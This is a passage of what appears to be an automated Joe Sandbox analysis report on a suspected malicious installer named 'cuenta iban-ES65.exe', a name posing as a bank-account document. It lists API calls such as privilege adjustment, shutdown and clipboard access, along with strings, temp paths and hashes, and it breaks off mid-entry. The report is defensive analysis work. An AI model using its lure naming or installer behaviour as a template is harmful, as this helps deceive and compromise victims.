SetEnvironmentVariableA.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low), ref: 0040331F
SetEnvironmentVariableA.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\), ref: 00403327
DeleteFileA.KERNELBASE(1033), ref: 0040333B

Part of subcall function 004060A5: GetModuleHandleA.KERNEL32(?,?,?,00403156,00000009), ref: 004060B7
Part of subcall function 004060A5: GetProcAddress.KERNEL32(00000000,?), ref: 004060D2

OleUninitialize.OLE32(?), ref: 004033E9
ExitProcess.KERNEL32 ref: 0040340A
GetCurrentProcess.KERNEL32(00000028,?), ref: 00403527
OpenProcessToken.ADVAPI32(00000000), ref: 0040352E
LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00403546
AdjustTokenPrivileges.ADVAPI32(?,?,?,?,00000000,?,00000000,00000000,00000000), ref: 00403565
ExitWindowsEx.USER32(00000002,80040002), ref: 00403589
ExitProcess.KERNEL32 ref: 004035AC

Part of subcall function 00405502: MessageBoxIndirectA.USER32(00409218), ref: 0040555D

Strings

SeShutdownPrivilege, xrefs: 00403540
UXTHEME, xrefs: 00403134, 00403139, 0040313F
C:\Users\user\AppData\Local\Temp\bandidos\Clearingkontoen\skrivetjet\Disenthralls\Ethnogenist82, xrefs: 004033C6
1033, xrefs: 00403336
C:\Users\user\Desktop, xrefs: 0040343C, 00403441, 0040346D
Error launching installer, xrefs: 004033A1
Centrifugers Setup, xrefs: 00403190
.tmp, xrefs: 00403431
~nsu, xrefs: 00403415
C:\Users\user\Desktop\cuenta iban-ES65.exe, xrefs: 004034C7
TMP, xrefs: 00403322
\Temp, xrefs: 004032EC
Low, xrefs: 00403308
`K1w, xrefs: 00403313
C:\Users\user\AppData\Local\Temp\bandidos\Clearingkontoen\skrivetjet, xrefs: 004032BA, 004033BB, 00403465, 0040346E
TEMP, xrefs: 0040331A
NSIS Error, xrefs: 0040318B
"C:\Users\user\Desktop\cuenta iban-ES65.exe", xrefs: 004031A0, 004031A6, 0040335F
C:\Users\user\AppData\Local\Temp\, xrefs: 004032CA, 004032CF, 004032E5, 004032F1, 00403300, 0040330D, 00403319, 00403321, 0040341A, 0040342B, 00403436, 00403442, 0040344F, 0040345E, 0040350D
", xrefs: 004031FD

Memory Dump Source

Source File: 00000000.00000002.13145407440.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.13145364564.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145453641.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145500169.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145500169.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145500169.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145500169.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145500169.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145500169.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145500169.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145500169.00000000007A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145500169.00000000007BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145500169.00000000007BF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13146430325.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_cuenta iban-ES65.jbxd

Similarity

API ID: Process$Exit$EnvironmentFileHandleModulePathTempTokenVariableWindowslstrcat$AddressAdjustCharCommandCurrentDeleteDirectoryErrorIndirectInfoInitializeLineLookupMessageModeNextOpenPrivilegePrivilegesProcUninitializeValueVersionlstrlen
String ID: "$"C:\Users\user\Desktop\cuenta iban-ES65.exe"$.tmp$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\bandidos\Clearingkontoen\skrivetjet$C:\Users\user\AppData\Local\Temp\bandidos\Clearingkontoen\skrivetjet\Disenthralls\Ethnogenist82$C:\Users\user\Desktop$C:\Users\user\Desktop\cuenta iban-ES65.exe$Centrifugers Setup$Error launching installer$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$`K1w$~nsu
API String ID: 3329125770-4006401587
Opcode ID: 6abb48eee298fabc64d5b75a2fcda338828ab476ca8097a17d05218fc85f4c00
Instruction ID: 9f005f8ea334ebed05284af4b2fd35d6cfc3abe5f946e81cdcf7347df6e605c8
Opcode Fuzzy Hash: 6abb48eee298fabc64d5b75a2fcda338828ab476ca8097a17d05218fc85f4c00
Instruction Fuzzy Hash: 02C1D7705082816AE7116F75AD4DA2F7EACAF8634AF04457FF541B61E2CB7C4A048B2E

Uniqueness

Uniqueness Score: -1.00%

Function 00405063 Relevance: 65.0, APIs: 36, Strings: 1, Instructions: 282
windowclipboardmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetDlgItem.USER32(?,00000403), ref: 004050C2
GetDlgItem.USER32(?,000003EE), ref: 004050D1
GetClientRect.USER32(?,?), ref: 0040510E
GetSystemMetrics.USER32(00000002), ref: 00405115
SendMessageA.USER32(?,0000101B,00000000,?), ref: 00405136
SendMessageA.USER32(?,00001036,00004000,00004000), ref: 00405147
SendMessageA.USER32(?,00001001,00000000,?), ref: 0040515A
SendMessageA.USER32(?,00001026,00000000,?), ref: 00405168
SendMessageA.USER32(?,00001024,00000000,?), ref: 0040517B
ShowWindow.USER32(00000000,?,0000001B,?), ref: 0040519D
ShowWindow.USER32(?,00000008), ref: 004051B1
GetDlgItem.USER32(?,000003EC), ref: 004051D2
SendMessageA.USER32(00000000,00000401,00000000,75300000), ref: 004051E2
SendMessageA.USER32(00000000,00000409,00000000,?), ref: 004051FB
SendMessageA.USER32(00000000,00002001,00000000,?), ref: 00405207
GetDlgItem.USER32(?,000003F8), ref: 004050E0

Part of subcall function 00403F26: SendMessageA.USER32(00000028,?,00000001,00403D57), ref: 00403F34

GetDlgItem.USER32(?,000003EC), ref: 00405223
CreateThread.KERNEL32(00000000,00000000,Function_00004FF7,00000000), ref: 00405231
CloseHandle.KERNELBASE(00000000), ref: 00405238
ShowWindow.USER32(00000000), ref: 0040525B
ShowWindow.USER32(?,00000008), ref: 00405262
ShowWindow.USER32(00000008), ref: 004052A8
SendMessageA.USER32(?,00001004,00000000,00000000), ref: 004052DC
CreatePopupMenu.USER32 ref: 004052ED
AppendMenuA.USER32(00000000,00000000,00000001,00000000), ref: 00405302
GetWindowRect.USER32(?,000000FF), ref: 00405322
TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 0040533B
SendMessageA.USER32(?,0000102D,00000000,?), ref: 00405377
OpenClipboard.USER32(00000000), ref: 00405387
EmptyClipboard.USER32 ref: 0040538D
GlobalAlloc.KERNEL32(00000042,?), ref: 00405396
GlobalLock.KERNEL32(00000000), ref: 004053A0
SendMessageA.USER32(?,0000102D,00000000,?), ref: 004053B4
GlobalUnlock.KERNEL32(00000000), ref: 004053CD
SetClipboardData.USER32(00000001,00000000), ref: 004053D8
CloseClipboard.USER32 ref: 004053DE

Strings

@y, xrefs: 00405353

Memory Dump Source

Source File: 00000000.00000002.13145407440.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.13145364564.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145453641.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145500169.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145500169.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145500169.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145500169.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145500169.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145500169.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145500169.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145500169.00000000007A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145500169.00000000007BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145500169.00000000007BF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13146430325.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_cuenta iban-ES65.jbxd

Similarity

API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
String ID: @y
API String ID: 590372296-2793234042
Opcode ID: a25ffd471f9c9911946ace575152b1356f6dbca2492df985bd5bd73bc0166ab8
Instruction ID: 0ac8b7377d144d48f6dc293dc42051cc71820a332a9e268c47e7b227606d372d
Opcode Fuzzy Hash: a25ffd471f9c9911946ace575152b1356f6dbca2492df985bd5bd73bc0166ab8
Instruction Fuzzy Hash: 2CA15B70900248BFEB119FA0DD89EAE7F79FB08355F10406AFA05B61A0C7795E41DF69

Uniqueness

Uniqueness Score: -1.00%

Function 00405D2E Relevance: 21.2, APIs: 8, Strings: 4, Instructions: 199
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetVersion.KERNEL32(00000006,Skipped: C:\Users\user\AppData\Local\Temp\nsn876E.tmp\System.dll,00000000,00404F5D,Skipped: C:\Users\user\AppData\Local\Temp\nsn876E.tmp\System.dll,00000000), ref: 00405DDF
GetSystemDirectoryA.KERNEL32(Call,00000400), ref: 00405E5A
GetWindowsDirectoryA.KERNEL32(Call,00000400), ref: 00405E6D
SHGetSpecialFolderLocation.SHELL32(?,0078FCF8), ref: 00405EA9
SHGetPathFromIDListA.SHELL32(0078FCF8,Call), ref: 00405EB7
CoTaskMemFree.OLE32(0078FCF8), ref: 00405EC2
lstrcatA.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch), ref: 00405EE4
lstrlenA.KERNEL32(Call,00000006,Skipped: C:\Users\user\AppData\Local\Temp\nsn876E.tmp\System.dll,00000000,00404F5D,Skipped: C:\Users\user\AppData\Local\Temp\nsn876E.tmp\System.dll,00000000), ref: 00405F36

Strings

Software\Microsoft\Windows\CurrentVersion, xrefs: 00405E29
\Microsoft\Internet Explorer\Quick Launch, xrefs: 00405EDE
Call, xrefs: 00405D55, 00405E27, 00405E44, 00405E59, 00405E6C, 00405E88, 00405EB3, 00405EE3, 00405EE9, 00405F01, 00405F14, 00405F2F, 00405F35, 00405F40, 00405F6A
Skipped: C:\Users\user\AppData\Local\Temp\nsn876E.tmp\System.dll, xrefs: 00405D5D

Memory Dump Source

Source File: 00000000.00000002.13145407440.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.13145364564.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145453641.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145500169.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145500169.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145500169.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145500169.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145500169.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145500169.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145500169.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145500169.00000000007A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145500169.00000000007BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145500169.00000000007BF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13146430325.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_cuenta iban-ES65.jbxd

Similarity

API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskVersionWindowslstrcatlstrlen
String ID: Call$Skipped: C:\Users\user\AppData\Local\Temp\nsn876E.tmp\System.dll$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
API String ID: 900638850-1513725331
Opcode ID: 8e4aff95ddad0addc738e551539eceb0a07d965f5232f19123b82c8b3c8fb634
Instruction ID: 9bfabfc36fba32fb106481ebf294e43342570200e8730ead7ab322b99494356e
Opcode Fuzzy Hash: 8e4aff95ddad0addc738e551539eceb0a07d965f5232f19123b82c8b3c8fb634
Instruction Fuzzy Hash: F7611231904A05ABEF115B24CC84BBF7BA8DB56314F10813BE555BA2D1D33D4A82DF9E

Uniqueness

Uniqueness Score: -1.00%

Function 004055AE Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 159
filestringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DeleteFileA.KERNELBASE(?,?,77303410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 004055D7
lstrcatA.KERNEL32(Mundstykket.min,\*.*,Mundstykket.min,?,?,77303410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 0040561F
lstrcatA.KERNEL32(?,00409014,?,Mundstykket.min,?,?,77303410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405640
lstrlenA.KERNEL32(?,?,00409014,?,Mundstykket.min,?,?,77303410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405646
FindFirstFileA.KERNELBASE(Mundstykket.min,?,?,?,00409014,?,Mundstykket.min,?,?,77303410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405657
FindNextFileA.KERNEL32(00000000,00000010,000000F2,?,?,?,00000000,?,?,0000003F), ref: 00405704
FindClose.KERNEL32(00000000), ref: 00405715

Strings

Mundstykket.min, xrefs: 00405607, 0040560D, 0040561E, 00405654
\*.*, xrefs: 00405619
"C:\Users\user\Desktop\cuenta iban-ES65.exe", xrefs: 004055AE
C:\Users\user\AppData\Local\Temp\, xrefs: 004055BB

Memory Dump Source

Source File: 00000000.00000002.13145407440.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.13145364564.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145453641.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145500169.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145500169.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145500169.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145500169.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145500169.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145500169.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145500169.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145500169.00000000007A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145500169.00000000007BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145500169.00000000007BF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13146430325.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_cuenta iban-ES65.jbxd

Similarity

API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
String ID: "C:\Users\user\Desktop\cuenta iban-ES65.exe"$C:\Users\user\AppData\Local\Temp\$Mundstykket.min$\*.*
API String ID: 2035342205-871046426
Opcode ID: a8a4b792d9683b8994eb6cd94214ef05887bb3d9b353618b8ffd8ce1ac1b6fd8
Instruction ID: 15aabf9ae26d8a027305d4c4078bc37ad96aa8a5c182164a2950041f9cf2f42d
Opcode Fuzzy Hash: a8a4b792d9683b8994eb6cd94214ef05887bb3d9b353618b8ffd8ce1ac1b6fd8
Instruction Fuzzy Hash: C651DF30800A04BADB21AB618C45BBF7A78DF42355F54857BF449B61D2D73C4981EE6E

Uniqueness

Uniqueness Score: -1.00%

Function 00406010 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 14fileCOMMON

Download Yara Rule

APIs

FindFirstFileA.KERNELBASE(77303410,0079FD90,Mundstykket.min,004058AF,Mundstykket.min,Mundstykket.min,00000000,Mundstykket.min,Mundstykket.min,77303410,?,C:\Users\user\AppData\Local\Temp\,004055CE,?,77303410,C:\Users\user\AppData\Local\Temp\), ref: 0040601B
FindClose.KERNELBASE(00000000), ref: 00406027

Strings

Mundstykket.min, xrefs: 00406010

Memory Dump Source

Source File: 00000000.00000002.13145407440.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.13145364564.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145453641.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145500169.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145500169.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145500169.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145500169.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145500169.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145500169.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145500169.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145500169.00000000007A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145500169.00000000007BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145500169.00000000007BF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13146430325.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_cuenta iban-ES65.jbxd

Similarity

API ID: Find$CloseFileFirst
String ID: Mundstykket.min
API String ID: 2295610775-3661976162
Opcode ID: d30bbc16997dfcf9f9a572ec6341a2188e66bfdc939d37fad3f946c8dc482195
Instruction ID: 592bcfe3733b0aa744bdfcff45d7cd7e76fdd068ce72c1f71716353b7d55c377
Opcode Fuzzy Hash: d30bbc16997dfcf9f9a572ec6341a2188e66bfdc939d37fad3f946c8dc482195
Instruction Fuzzy Hash: 02D012319491305BC714977C7D4C84F7A6C9B193717114A32F46AF12E0C6749CA286E9

Uniqueness

Uniqueness Score: -1.00%

Function 00403A1E Relevance: 59.8, APIs: 32, Strings: 2, Instructions: 345
windowstringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403A5A
ShowWindow.USER32(?), ref: 00403A77
DestroyWindow.USER32 ref: 00403A8B
SetWindowLongA.USER32(?,00000000,00000000), ref: 00403AA7
GetDlgItem.USER32(?,?), ref: 00403AC8
SendMessageA.USER32(00000000,000000F3,00000000,00000000), ref: 00403ADC
IsWindowEnabled.USER32(00000000), ref: 00403AE3
GetDlgItem.USER32(?,00000001), ref: 00403B91
GetDlgItem.USER32(?,00000002), ref: 00403B9B
SetClassLongA.USER32(?,000000F2,?), ref: 00403BB5
SendMessageA.USER32(0000040F,00000000,00000001,?), ref: 00403C06
GetDlgItem.USER32(?,00000003), ref: 00403CAC
ShowWindow.USER32(00000000,?), ref: 00403CCD
KiUserCallbackDispatcher.NTDLL(?,?), ref: 00403CDF
EnableWindow.USER32(?,?), ref: 00403CFA
GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00403D10
EnableMenuItem.USER32(00000000), ref: 00403D17
SendMessageA.USER32(?,000000F4,00000000,00000001), ref: 00403D2F
SendMessageA.USER32(?,00000401,00000002,00000000), ref: 00403D42
lstrlenA.KERNEL32(0079E540,?,0079E540,Centrifugers Setup), ref: 00403D6B
SetWindowTextA.USER32(?,0079E540), ref: 00403D7A
ShowWindow.USER32(?,0000000A), ref: 00403EAE

Strings

Centrifugers Setup, xrefs: 00403D5C
@y, xrefs: 00403D57

Memory Dump Source

Source File: 00000000.00000002.13145407440.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.13145364564.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145453641.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145500169.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145500169.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145500169.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145500169.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145500169.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145500169.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145500169.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145500169.00000000007A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145500169.00000000007BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145500169.00000000007BF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13146430325.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_cuenta iban-ES65.jbxd

Similarity

API ID: Window$Item$MessageSend$Show$EnableLongMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
String ID: @y$Centrifugers Setup
API String ID: 3282139019-1221847780
Opcode ID: cc9d0d33d140f6c7f3dfcc1daafeed48d3c30ff6fb1dcf2fe60019aa41219e48
Instruction ID: 604a4885fc931abc1044a41a4cf0f2958d917e977c7d56f4e50accb35e18e33b
Opcode Fuzzy Hash: cc9d0d33d140f6c7f3dfcc1daafeed48d3c30ff6fb1dcf2fe60019aa41219e48
Instruction Fuzzy Hash: F1C1AE31904205ABEB216F61ED85E2B3EACEB4574AF00453EF501B11F1C739A942DB5E

Uniqueness

Uniqueness Score: -1.00%

Function 0040368C Relevance: 47.5, APIs: 13, Strings: 14, Instructions: 215
stringregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 004060A5: GetModuleHandleA.KERNEL32(?,?,?,00403156,00000009), ref: 004060B7
Part of subcall function 004060A5: GetProcAddress.KERNEL32(00000000,?), ref: 004060D2

lstrcatA.KERNEL32(1033,0079E540,80000001,Control Panel\Desktop\ResourceLocale,00000000,0079E540,00000000,00000002,77303410,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\cuenta iban-ES65.exe",00000000), ref: 00403707
lstrlenA.KERNEL32(Call,?,?,?,Call,00000000,C:\Users\user\AppData\Local\Temp\bandidos\Clearingkontoen\skrivetjet,1033,0079E540,80000001,Control Panel\Desktop\ResourceLocale,00000000,0079E540,00000000,00000002,77303410), ref: 0040377C
lstrcmpiA.KERNEL32(?,.exe), ref: 0040378F
GetFileAttributesA.KERNEL32(Call), ref: 0040379A
LoadImageA.USER32(00000067,00000001,00000000,00000000,00008040,C:\Users\user\AppData\Local\Temp\bandidos\Clearingkontoen\skrivetjet), ref: 004037E3

Part of subcall function 00405C6A: wsprintfA.USER32 ref: 00405C77

RegisterClassA.USER32(007A16E0), ref: 00403820
SystemParametersInfoA.USER32(00000030,00000000,?,00000000), ref: 00403838
CreateWindowExA.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 0040386D
ShowWindow.USER32(00000005,00000000), ref: 004038A3
GetClassInfoA.USER32(00000000,RichEdit20A,007A16E0), ref: 004038CF
GetClassInfoA.USER32(00000000,RichEdit,007A16E0), ref: 004038DC
RegisterClassA.USER32(007A16E0), ref: 004038E5
DialogBoxParamA.USER32(?,00000000,00403A1E,00000000), ref: 00403904

Strings

1033, xrefs: 004036AC, 00403702
Call, xrefs: 0040374A, 00403752, 0040375F, 004037A9, 004037AF
RichEd20, xrefs: 004038A9
_Nb, xrefs: 004037FF, 00403867
.exe, xrefs: 00403789
RichEd32, xrefs: 004038B7
@y, xrefs: 004036B8
RichEdit, xrefs: 004038D6
Control Panel\Desktop\ResourceLocale, xrefs: 004036C0
.DEFAULT\Control Panel\International, xrefs: 004036F2
C:\Users\user\AppData\Local\Temp\bandidos\Clearingkontoen\skrivetjet, xrefs: 00403716, 0040371E, 004037B6, 004037BC, 004037CC
RichEdit20A, xrefs: 004038C7, 004038CD
"C:\Users\user\Desktop\cuenta iban-ES65.exe", xrefs: 00403690
C:\Users\user\AppData\Local\Temp\, xrefs: 00403691

Memory Dump Source

Source File: 00000000.00000002.13145407440.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.13145364564.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145453641.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145500169.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145500169.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145500169.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145500169.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145500169.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145500169.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145500169.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145500169.00000000007A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145500169.00000000007BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145500169.00000000007BF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13146430325.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_cuenta iban-ES65.jbxd

Similarity

API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
String ID: "C:\Users\user\Desktop\cuenta iban-ES65.exe"$.DEFAULT\Control Panel\International$.exe$1033$@y$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\bandidos\Clearingkontoen\skrivetjet$Call$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20A$_Nb
API String ID: 1975747703-1750417627
Opcode ID: 5ab0478d8d29fcc30d6f86d58a97276ab6e1e5173614108ac56cb6ac56f41f24
Instruction ID: b6748c6733e3bb55aa357910a2c4fdec813f4d760fd6ac6bc3454eeade69f907
Opcode Fuzzy Hash: 5ab0478d8d29fcc30d6f86d58a97276ab6e1e5173614108ac56cb6ac56f41f24
Instruction Fuzzy Hash: D06106B4504244AEE710AF659C45F3B3AACEB85789F00857FF900B22E1D77CAD019B2D

Uniqueness

Uniqueness Score: -1.00%

Function 00402C66 Relevance: 24.7, APIs: 5, Strings: 9, Instructions: 182
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetTickCount.KERNEL32 ref: 00402C77
GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\cuenta iban-ES65.exe,00000400), ref: 00402C93

Part of subcall function 0040597F: GetFileAttributesA.KERNELBASE(00000003,00402CA6,C:\Users\user\Desktop\cuenta iban-ES65.exe,80000000,00000003), ref: 00405983
Part of subcall function 0040597F: CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 004059A5

GetFileSize.KERNEL32(00000000,00000000,007AA000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\cuenta iban-ES65.exe,C:\Users\user\Desktop\cuenta iban-ES65.exe,80000000,00000003), ref: 00402CDF

Strings

